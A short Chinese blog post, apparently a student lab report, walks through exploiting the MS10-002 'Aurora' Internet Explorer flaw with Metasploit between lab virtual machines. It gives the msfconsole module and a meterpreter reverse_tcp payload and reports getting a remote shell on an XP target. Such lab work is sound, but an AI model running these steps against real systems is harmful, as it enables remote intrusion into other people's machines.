对浏览器攻击:MS10-002
对浏览器攻击:MS10-002
MS10-002漏洞介绍
- 针对微软Internet Explorer“极光”内存损坏的攻击,当用户查看特制网页时允许远程执行代码。
实践过程
- 命令行使用
msfconsole
打开msf控制台,然后输入use windows/browser/ms10_002_aurora
来使用 - 设置如上图标出的两项内容并使用
set payload windows/meterpreter/reverse_tcp
设置反弹方式 - 使用
show option
来看看有什么要用的信息并进行补充:
- 启动服务并开始监听:
- 然后在另外一台虚拟机(XP)中通过IE浏览
http://192.168.1.180:80/
,回到攻击主机中可以看到攻击成功,测试一下进入shell并查看系统信息:
- 这里从上面看到我尝试了两个虚拟机,第一次没有成功,是老师的XP-SP3里面的IE8,第二个是我自己下的英文版的XP-SP2里面的IE6。
posted on 2017-04-12 15:46 20145208蔡野 阅读(1245) 评论(0) 编辑 收藏 举报